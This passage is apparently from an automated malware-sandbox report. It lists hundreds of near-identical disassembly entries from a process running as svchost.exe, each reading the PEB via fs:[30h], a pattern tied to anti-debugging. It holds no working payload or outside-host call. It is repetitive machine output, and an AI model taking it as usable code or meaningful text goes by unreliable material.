                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0346656A mov eax, dword ptr fs:[00000030h]2_2_0346656A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034C6500 mov eax, dword ptr fs:[00000030h]2_2_034C6500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03504500 mov eax, dword ptr fs:[00000030h]2_2_03504500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03504500 mov eax, dword ptr fs:[00000030h]2_2_03504500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03504500 mov eax, dword ptr fs:[00000030h]2_2_03504500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03504500 mov eax, dword ptr fs:[00000030h]2_2_03504500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03504500 mov eax, dword ptr fs:[00000030h]2_2_03504500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03504500 mov eax, dword ptr fs:[00000030h]2_2_03504500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03504500 mov eax, dword ptr fs:[00000030h]2_2_03504500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03440535 mov eax, dword ptr fs:[00000030h]2_2_03440535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03440535 mov eax, dword ptr fs:[00000030h]2_2_03440535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03440535 mov eax, dword ptr fs:[00000030h]2_2_03440535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03440535 mov eax, dword ptr fs:[00000030h]2_2_03440535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03440535 mov eax, dword ptr fs:[00000030h]2_2_03440535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03440535 mov eax, dword ptr fs:[00000030h]2_2_03440535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0345E53E mov eax, dword ptr fs:[00000030h]2_2_0345E53E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0345E53E mov eax, dword ptr fs:[00000030h]2_2_0345E53E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0345E53E mov eax, dword ptr fs:[00000030h]2_2_0345E53E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0345E53E mov eax, dword ptr fs:[00000030h]2_2_0345E53E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0345E53E mov eax, dword ptr fs:[00000030h]2_2_0345E53E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0346E5CF mov eax, dword ptr fs:[00000030h]2_2_0346E5CF
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0346E5CF mov eax, dword ptr fs:[00000030h]2_2_0346E5CF
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034365D0 mov eax, dword ptr fs:[00000030h]2_2_034365D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0346A5D0 mov eax, dword ptr fs:[00000030h]2_2_0346A5D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0346A5D0 mov eax, dword ptr fs:[00000030h]2_2_0346A5D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0345E5E7 mov eax, dword ptr fs:[00000030h]2_2_0345E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0345E5E7 mov eax, dword ptr fs:[00000030h]2_2_0345E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0345E5E7 mov eax, dword ptr fs:[00000030h]2_2_0345E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0345E5E7 mov eax, dword ptr fs:[00000030h]2_2_0345E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0345E5E7 mov eax, dword ptr fs:[00000030h]2_2_0345E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0345E5E7 mov eax, dword ptr fs:[00000030h]2_2_0345E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0345E5E7 mov eax, dword ptr fs:[00000030h]2_2_0345E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0345E5E7 mov eax, dword ptr fs:[00000030h]2_2_0345E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034325E0 mov eax, dword ptr fs:[00000030h]2_2_034325E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0346C5ED mov eax, dword ptr fs:[00000030h]2_2_0346C5ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0346C5ED mov eax, dword ptr fs:[00000030h]2_2_0346C5ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03432582 mov eax, dword ptr fs:[00000030h]2_2_03432582
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03432582 mov ecx, dword ptr fs:[00000030h]2_2_03432582
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03464588 mov eax, dword ptr fs:[00000030h]2_2_03464588
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0346E59C mov eax, dword ptr fs:[00000030h]2_2_0346E59C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034B05A7 mov eax, dword ptr fs:[00000030h]2_2_034B05A7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034B05A7 mov eax, dword ptr fs:[00000030h]2_2_034B05A7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034B05A7 mov eax, dword ptr fs:[00000030h]2_2_034B05A7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034545B1 mov eax, dword ptr fs:[00000030h]2_2_034545B1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034545B1 mov eax, dword ptr fs:[00000030h]2_2_034545B1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0346E443 mov eax, dword ptr fs:[00000030h]2_2_0346E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0346E443 mov eax, dword ptr fs:[00000030h]2_2_0346E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0346E443 mov eax, dword ptr fs:[00000030h]2_2_0346E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0346E443 mov eax, dword ptr fs:[00000030h]2_2_0346E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0346E443 mov eax, dword ptr fs:[00000030h]2_2_0346E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0346E443 mov eax, dword ptr fs:[00000030h]2_2_0346E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0346E443 mov eax, dword ptr fs:[00000030h]2_2_0346E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0346E443 mov eax, dword ptr fs:[00000030h]2_2_0346E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034EA456 mov eax, dword ptr fs:[00000030h]2_2_034EA456
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0342645D mov eax, dword ptr fs:[00000030h]2_2_0342645D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0345245A mov eax, dword ptr fs:[00000030h]2_2_0345245A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034BC460 mov ecx, dword ptr fs:[00000030h]2_2_034BC460
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0345A470 mov eax, dword ptr fs:[00000030h]2_2_0345A470
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0345A470 mov eax, dword ptr fs:[00000030h]2_2_0345A470
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0345A470 mov eax, dword ptr fs:[00000030h]2_2_0345A470
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03468402 mov eax, dword ptr fs:[00000030h]2_2_03468402
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03468402 mov eax, dword ptr fs:[00000030h]2_2_03468402
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03468402 mov eax, dword ptr fs:[00000030h]2_2_03468402
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0342E420 mov eax, dword ptr fs:[00000030h]2_2_0342E420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0342E420 mov eax, dword ptr fs:[00000030h]2_2_0342E420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0342E420 mov eax, dword ptr fs:[00000030h]2_2_0342E420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0342C427 mov eax, dword ptr fs:[00000030h]2_2_0342C427
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034B6420 mov eax, dword ptr fs:[00000030h]2_2_034B6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034B6420 mov eax, dword ptr fs:[00000030h]2_2_034B6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034B6420 mov eax, dword ptr fs:[00000030h]2_2_034B6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034B6420 mov eax, dword ptr fs:[00000030h]2_2_034B6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034B6420 mov eax, dword ptr fs:[00000030h]2_2_034B6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034B6420 mov eax, dword ptr fs:[00000030h]2_2_034B6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034B6420 mov eax, dword ptr fs:[00000030h]2_2_034B6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0346A430 mov eax, dword ptr fs:[00000030h]2_2_0346A430
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034304E5 mov ecx, dword ptr fs:[00000030h]2_2_034304E5
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034EA49A mov eax, dword ptr fs:[00000030h]2_2_034EA49A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034364AB mov eax, dword ptr fs:[00000030h]2_2_034364AB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034644B0 mov ecx, dword ptr fs:[00000030h]2_2_034644B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034BA4B0 mov eax, dword ptr fs:[00000030h]2_2_034BA4B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034E4B4B mov eax, dword ptr fs:[00000030h]2_2_034E4B4B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034E4B4B mov eax, dword ptr fs:[00000030h]2_2_034E4B4B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03502B57 mov eax, dword ptr fs:[00000030h]2_2_03502B57
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03502B57 mov eax, dword ptr fs:[00000030h]2_2_03502B57
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03502B57 mov eax, dword ptr fs:[00000030h]2_2_03502B57
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03502B57 mov eax, dword ptr fs:[00000030h]2_2_03502B57
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034C6B40 mov eax, dword ptr fs:[00000030h]2_2_034C6B40
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034C6B40 mov eax, dword ptr fs:[00000030h]2_2_034C6B40
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034FAB40 mov eax, dword ptr fs:[00000030h]2_2_034FAB40
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034D8B42 mov eax, dword ptr fs:[00000030h]2_2_034D8B42
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03428B50 mov eax, dword ptr fs:[00000030h]2_2_03428B50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034DEB50 mov eax, dword ptr fs:[00000030h]2_2_034DEB50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0342CB7E mov eax, dword ptr fs:[00000030h]2_2_0342CB7E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03504B00 mov eax, dword ptr fs:[00000030h]2_2_03504B00
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034AEB1D mov eax, dword ptr fs:[00000030h]2_2_034AEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034AEB1D mov eax, dword ptr fs:[00000030h]2_2_034AEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034AEB1D mov eax, dword ptr fs:[00000030h]2_2_034AEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034AEB1D mov eax, dword ptr fs:[00000030h]2_2_034AEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034AEB1D mov eax, dword ptr fs:[00000030h]2_2_034AEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034AEB1D mov eax, dword ptr fs:[00000030h]2_2_034AEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034AEB1D mov eax, dword ptr fs:[00000030h]2_2_034AEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034AEB1D mov eax, dword ptr fs:[00000030h]2_2_034AEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034AEB1D mov eax, dword ptr fs:[00000030h]2_2_034AEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0345EB20 mov eax, dword ptr fs:[00000030h]2_2_0345EB20
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0345EB20 mov eax, dword ptr fs:[00000030h]2_2_0345EB20
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034F8B28 mov eax, dword ptr fs:[00000030h]2_2_034F8B28
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034F8B28 mov eax, dword ptr fs:[00000030h]2_2_034F8B28
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03450BCB mov eax, dword ptr fs:[00000030h]2_2_03450BCB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03450BCB mov eax, dword ptr fs:[00000030h]2_2_03450BCB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03450BCB mov eax, dword ptr fs:[00000030h]2_2_03450BCB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03430BCD mov eax, dword ptr fs:[00000030h]2_2_03430BCD
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03430BCD mov eax, dword ptr fs:[00000030h]2_2_03430BCD
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03430BCD mov eax, dword ptr fs:[00000030h]2_2_03430BCD
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034DEBD0 mov eax, dword ptr fs:[00000030h]2_2_034DEBD0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03438BF0 mov eax, dword ptr fs:[00000030h]2_2_03438BF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03438BF0 mov eax, dword ptr fs:[00000030h]2_2_03438BF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03438BF0 mov eax, dword ptr fs:[00000030h]2_2_03438BF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0345EBFC mov eax, dword ptr fs:[00000030h]2_2_0345EBFC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034BCBF0 mov eax, dword ptr fs:[00000030h]2_2_034BCBF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03440BBE mov eax, dword ptr fs:[00000030h]2_2_03440BBE
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03440BBE mov eax, dword ptr fs:[00000030h]2_2_03440BBE
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034E4BB0 mov eax, dword ptr fs:[00000030h]2_2_034E4BB0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034E4BB0 mov eax, dword ptr fs:[00000030h]2_2_034E4BB0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03436A50 mov eax, dword ptr fs:[00000030h]2_2_03436A50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03436A50 mov eax, dword ptr fs:[00000030h]2_2_03436A50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03436A50 mov eax, dword ptr fs:[00000030h]2_2_03436A50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03436A50 mov eax, dword ptr fs:[00000030h]2_2_03436A50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03436A50 mov eax, dword ptr fs:[00000030h]2_2_03436A50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03436A50 mov eax, dword ptr fs:[00000030h]2_2_03436A50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03436A50 mov eax, dword ptr fs:[00000030h]2_2_03436A50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03440A5B mov eax, dword ptr fs:[00000030h]2_2_03440A5B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03440A5B mov eax, dword ptr fs:[00000030h]2_2_03440A5B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0346CA6F mov eax, dword ptr fs:[00000030h]2_2_0346CA6F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0346CA6F mov eax, dword ptr fs:[00000030h]2_2_0346CA6F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0346CA6F mov eax, dword ptr fs:[00000030h]2_2_0346CA6F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034DEA60 mov eax, dword ptr fs:[00000030h]2_2_034DEA60
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034ACA72 mov eax, dword ptr fs:[00000030h]2_2_034ACA72
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034ACA72 mov eax, dword ptr fs:[00000030h]2_2_034ACA72
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034BCA11 mov eax, dword ptr fs:[00000030h]2_2_034BCA11
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0346CA24 mov eax, dword ptr fs:[00000030h]2_2_0346CA24
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0345EA2E mov eax, dword ptr fs:[00000030h]2_2_0345EA2E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03454A35 mov eax, dword ptr fs:[00000030h]2_2_03454A35
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03454A35 mov eax, dword ptr fs:[00000030h]2_2_03454A35
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0346CA38 mov eax, dword ptr fs:[00000030h]2_2_0346CA38
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03486ACC mov eax, dword ptr fs:[00000030h]2_2_03486ACC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03486ACC mov eax, dword ptr fs:[00000030h]2_2_03486ACC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03486ACC mov eax, dword ptr fs:[00000030h]2_2_03486ACC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03430AD0 mov eax, dword ptr fs:[00000030h]2_2_03430AD0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03464AD0 mov eax, dword ptr fs:[00000030h]2_2_03464AD0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03464AD0 mov eax, dword ptr fs:[00000030h]2_2_03464AD0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0346AAEE mov eax, dword ptr fs:[00000030h]2_2_0346AAEE
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0346AAEE mov eax, dword ptr fs:[00000030h]2_2_0346AAEE
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0343EA80 mov eax, dword ptr fs:[00000030h]2_2_0343EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0343EA80 mov eax, dword ptr fs:[00000030h]2_2_0343EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0343EA80 mov eax, dword ptr fs:[00000030h]2_2_0343EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0343EA80 mov eax, dword ptr fs:[00000030h]2_2_0343EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0343EA80 mov eax, dword ptr fs:[00000030h]2_2_0343EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0343EA80 mov eax, dword ptr fs:[00000030h]2_2_0343EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0343EA80 mov eax, dword ptr fs:[00000030h]2_2_0343EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0343EA80 mov eax, dword ptr fs:[00000030h]2_2_0343EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0343EA80 mov eax, dword ptr fs:[00000030h]2_2_0343EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03504A80 mov eax, dword ptr fs:[00000030h]2_2_03504A80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03468A90 mov edx, dword ptr fs:[00000030h]2_2_03468A90
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03438AA0 mov eax, dword ptr fs:[00000030h]2_2_03438AA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03438AA0 mov eax, dword ptr fs:[00000030h]2_2_03438AA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03486AA4 mov eax, dword ptr fs:[00000030h]2_2_03486AA4
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034B0946 mov eax, dword ptr fs:[00000030h]2_2_034B0946
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03504940 mov eax, dword ptr fs:[00000030h]2_2_03504940
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03456962 mov eax, dword ptr fs:[00000030h]2_2_03456962
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03456962 mov eax, dword ptr fs:[00000030h]2_2_03456962
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03456962 mov eax, dword ptr fs:[00000030h]2_2_03456962
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0347096E mov eax, dword ptr fs:[00000030h]2_2_0347096E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0347096E mov edx, dword ptr fs:[00000030h]2_2_0347096E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0347096E mov eax, dword ptr fs:[00000030h]2_2_0347096E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034D4978 mov eax, dword ptr fs:[00000030h]2_2_034D4978
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034D4978 mov eax, dword ptr fs:[00000030h]2_2_034D4978
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034BC97C mov eax, dword ptr fs:[00000030h]2_2_034BC97C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034AE908 mov eax, dword ptr fs:[00000030h]2_2_034AE908
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034AE908 mov eax, dword ptr fs:[00000030h]2_2_034AE908
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034BC912 mov eax, dword ptr fs:[00000030h]2_2_034BC912
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03428918 mov eax, dword ptr fs:[00000030h]2_2_03428918
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03428918 mov eax, dword ptr fs:[00000030h]2_2_03428918
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034B892A mov eax, dword ptr fs:[00000030h]2_2_034B892A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034C892B mov eax, dword ptr fs:[00000030h]2_2_034C892B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034C69C0 mov eax, dword ptr fs:[00000030h]2_2_034C69C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0343A9D0 mov eax, dword ptr fs:[00000030h]2_2_0343A9D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0343A9D0 mov eax, dword ptr fs:[00000030h]2_2_0343A9D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0343A9D0 mov eax, dword ptr fs:[00000030h]2_2_0343A9D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0343A9D0 mov eax, dword ptr fs:[00000030h]2_2_0343A9D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0343A9D0 mov eax, dword ptr fs:[00000030h]2_2_0343A9D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0343A9D0 mov eax, dword ptr fs:[00000030h]2_2_0343A9D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034649D0 mov eax, dword ptr fs:[00000030h]2_2_034649D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034FA9D3 mov eax, dword ptr fs:[00000030h]2_2_034FA9D3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034BE9E0 mov eax, dword ptr fs:[00000030h]2_2_034BE9E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034629F9 mov eax, dword ptr fs:[00000030h]2_2_034629F9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034629F9 mov eax, dword ptr fs:[00000030h]2_2_034629F9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034429A0 mov eax, dword ptr fs:[00000030h]2_2_034429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034429A0 mov eax, dword ptr fs:[00000030h]2_2_034429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034429A0 mov eax, dword ptr fs:[00000030h]2_2_034429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034429A0 mov eax, dword ptr fs:[00000030h]2_2_034429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034429A0 mov eax, dword ptr fs:[00000030h]2_2_034429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034429A0 mov eax, dword ptr fs:[00000030h]2_2_034429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034429A0 mov eax, dword ptr fs:[00000030h]2_2_034429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034429A0 mov eax, dword ptr fs:[00000030h]2_2_034429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034429A0 mov eax, dword ptr fs:[00000030h]2_2_034429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034429A0 mov eax, dword ptr fs:[00000030h]2_2_034429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034429A0 mov eax, dword ptr fs:[00000030h]2_2_034429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034429A0 mov eax, dword ptr fs:[00000030h]2_2_034429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034429A0 mov eax, dword ptr fs:[00000030h]2_2_034429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034309AD mov eax, dword ptr fs:[00000030h]2_2_034309AD
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034309AD mov eax, dword ptr fs:[00000030h]2_2_034309AD
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034B89B3 mov esi, dword ptr fs:[00000030h]2_2_034B89B3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034B89B3 mov eax, dword ptr fs:[00000030h]2_2_034B89B3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034B89B3 mov eax, dword ptr fs:[00000030h]2_2_034B89B3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03442840 mov ecx, dword ptr fs:[00000030h]2_2_03442840
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03460854 mov eax, dword ptr fs:[00000030h]2_2_03460854
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03434859 mov eax, dword ptr fs:[00000030h]2_2_03434859
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03434859 mov eax, dword ptr fs:[00000030h]2_2_03434859
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034BE872 mov eax, dword ptr fs:[00000030h]2_2_034BE872
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034BE872 mov eax, dword ptr fs:[00000030h]2_2_034BE872
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034C6870 mov eax, dword ptr fs:[00000030h]2_2_034C6870
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034C6870 mov eax, dword ptr fs:[00000030h]2_2_034C6870
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034BC810 mov eax, dword ptr fs:[00000030h]2_2_034BC810
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03452835 mov eax, dword ptr fs:[00000030h]2_2_03452835
